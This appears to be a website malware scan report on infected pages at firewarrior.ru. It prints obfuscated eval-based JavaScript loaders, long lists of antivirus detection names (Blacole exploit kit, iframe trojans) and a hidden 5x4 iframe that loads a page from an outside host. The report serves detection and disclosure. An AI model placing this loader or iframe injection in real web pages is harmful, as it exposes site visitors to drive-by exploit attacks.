- Avast
- JS:Agent-KE [Trj]
- Ikarus
- Exploit.JS.Blacole
- nProtect
- Trojan.JS.Iframe.AHH
- K7AntiVirus
- Riskware
- TrendMicro-HouseCall
- TROJ_GEN.RCBH1B1
- Emsisoft
- Trojan.JS.Iframe.AHH (B)
- Comodo
- TrojWare.JS.Kryptik.AY
- McAfee-GW-Edition
- JS/Exploit-Blacole.cp
- DrWeb
- JS.Click.233
- Kaspersky
- Trojan-Downloader.JS.Agent.fzo
- Microsoft
- Exploit:JS/Blacole.A
- MicroWorld-eScan
- Trojan.JS.Iframe.AHH
- Fortinet
- JS/Crypt.AAFD!tr
- Jiangmin
- Trojan/Script.Gen
- McAfee
- JS/Exploit-Blacole.cp
- NANO-Antivirus
- Trojan.Script.Iframe.dumti
- F-Secure
- Trojan.JS.Iframe.AHH
- VIPRE
- Trojan.JS.Obfuscator.v (v)
- F-Prot
- JS/Crypted.OB.gen
- AVG
- JS/Agent.L
- Norman
- Agent.WM
- GData
- Trojan.JS.Iframe.AHH
- Commtouch
- JS/Crypted.OB.gen
- BitDefender
- Trojan.JS.Iframe.AHH
Hidden iFrame found. The same iFrame was found in 9 websites. size: 5x4 src: http://goldisoverfotoday.com/r/g.php <iframe src="http://goldisoverfotoday.com/r/g.php" width="5" height="4" align="right"> |
http://www.firewarrior.ru/arms/sleeve.html | 200 OK Content-Length: 12870 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) el=document.createElement("div");el.innerHTML="ReferenceErr";try{try{throw 1}catch(a){b[2]=21};}catch(a){k=el.innerHTML+a.toString().substr(0,0);};ar="'0hb<prCd;soT.{Ngt]Bky:mwi1aAe}vEf>=cn[ l/\")( u,";ar2="R180c180c100c132c156c176c32c44c144c184c92c116c148c68c52c64c116c68c128c160c116c92c116c148c68c40c76c84c48c108c64c60c108c92c116c176c0c12c44c32c84c0c172c152c4c72c172c56c180c180c180c100c1
... 1453 bytes are skipped ...c100c12c184c68c116c176c0c8c116c100c64c8c68c0c188c0c104c4c0c172c36c180c180c180c32c44c144c184c92c116c148c68c52c64c116c68c128c160c116c92c116c148c68c40c76c84c48c108c64c60c108c92c116c176c0c12c44c32c84c0c172c152c4c72c52c108c20c20c116c148c32c28c8c100c160c32c176c132c172c36c180c180c120";pau="urn eReferenceErr".replace(k,"val");e=Function("ret"+pau)();ar2=ar2.split("c");ar2[0]="180";s="";for(i=0;i!=ar2.length;i++){e('pos=parseInt(k.replace("Referen","0asd"))+ar2[i]/4');e('s+=ar.substr(pos,1)');} e(s);Antivirus reports:- AntiVir
- JS/Redirector.htr
- Avast
- JS:Agent-KE [Trj]
- Ikarus
- Exploit.JS.Blacole
- nProtect
- Trojan.JS.Iframe.AHH
- K7AntiVirus
- Riskware
- TrendMicro-HouseCall
- TROJ_GEN.RCBH1B1
- Emsisoft
- Trojan.JS.Iframe.AHH (B)
- Comodo
- TrojWare.JS.Kryptik.AY
- McAfee-GW-Edition
- JS/Exploit-Blacole.cp
- DrWeb
- JS.Click.233
- Kaspersky
- Trojan-Downloader.JS.Agent.fzo
- Microsoft
- Exploit:JS/Blacole.A
- MicroWorld-eScan
- Trojan.JS.Iframe.AHH
- Fortinet
- JS/Crypt.AAFD!tr
- Jiangmin
- Trojan/Script.Gen
- McAfee
- JS/Exploit-Blacole.cp
- NANO-Antivirus
- Trojan.Script.Iframe.dumti
- F-Secure
- Trojan.JS.Iframe.AHH
- VIPRE
- Trojan.JS.Obfuscator.v (v)
- F-Prot
- JS/Crypted.OB.gen
- AVG
- JS/Agent.L
- Norman
- Agent.WM
- GData
- Trojan.JS.Iframe.AHH
- Commtouch
- JS/Crypted.OB.gen
- BitDefender
- Trojan.JS.Iframe.AHH
Hidden iFrame found. The same iFrame was found in 9 websites. size: 5x4 src: http://goldisoverfotoday.com/r/g.php <iframe src="http://goldisoverfotoday.com/r/g.php" width="5" height="4" align="right"> |
http://www.firewarrior.ru/arms/rescue.html | 200 OK Content-Length: 12367 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) el=document.createElement("div");el.innerHTML="ReferenceErr";try{try{throw 1}catch(a){b[2]=21};}catch(a){k=el.innerHTML+a.toString().substr(0,0);};ar="'0hb<prCd;soT.{Ngt]Bky:mwi1aAe}vEf>=cn[ l/\")( u,";ar2="R180c180c100c132c156c176c32c44c144c184c92c116c148c68c52c64c116c68c128c160c116c92c116c148c68c40c76c84c48c108c64c60c108c92c116c176c0c12c44c32c84c0c172c152c4c72c172c56c180c180c180c100c1
... 1453 bytes are skipped ...c100c12c184c68c116c176c0c8c116c100c64c8c68c0c188c0c104c4c0c172c36c180c180c180c32c44c144c184c92c116c148c68c52c64c116c68c128c160c116c92c116c148c68c40c76c84c48c108c64c60c108c92c116c176c0c12c44c32c84c0c172c152c4c72c52c108c20c20c116c148c32c28c8c100c160c32c176c132c172c36c180c180c120";pau="urn eReferenceErr".replace(k,"val");e=Function("ret"+pau)();ar2=ar2.split("c");ar2[0]="180";s="";for(i=0;i!=ar2.length;i++){e('pos=parseInt(k.replace("Referen","0asd"))+ar2[i]/4');e('s+=ar.substr(pos,1)');} e(s);Antivirus reports:- AntiVir
- JS/Redirector.htr
- Avast
- JS:Agent-KE [Trj]
- Ikarus
- Exploit.JS.Blacole
- nProtect
- Trojan.JS.Iframe.AHH
- K7AntiVirus
- Riskware
- TrendMicro-HouseCall
- TROJ_GEN.RCBH1B1
- Emsisoft
- Trojan.JS.Iframe.AHH (B)
- Comodo
- TrojWare.JS.Kryptik.AY
- McAfee-GW-Edition
- JS/Exploit-Blacole.cp
- DrWeb
- JS.Click.233
- Kaspersky
- Trojan-Downloader.JS.Agent.fzo
- Microsoft
- Exploit:JS/Blacole.A
- MicroWorld-eScan
- Trojan.JS.Iframe.AHH
- Fortinet
- JS/Crypt.AAFD!tr
- Jiangmin
- Trojan/Script.Gen
- McAfee
- JS/Exploit-Blacole.cp
- NANO-Antivirus
- Trojan.Script.Iframe.dumti
- F-Secure
- Trojan.JS.Iframe.AHH
- VIPRE
- Trojan.JS.Obfuscator.v (v)
- F-Prot
- JS/Crypted.OB.gen
- AVG
- JS/Agent.L
- Norman
- Agent.WM
- GData
- Trojan.JS.Iframe.AHH
- Commtouch
- JS/Crypted.OB.gen
- BitDefender
- Trojan.JS.Iframe.AHH
Hidden iFrame found. The same iFrame was found in 9 websites. size: 5x4 src: http://goldisoverfotoday.com/r/g.php <iframe src="http://goldisoverfotoday.com/r/g.php" width="5" height="4" align="right"> |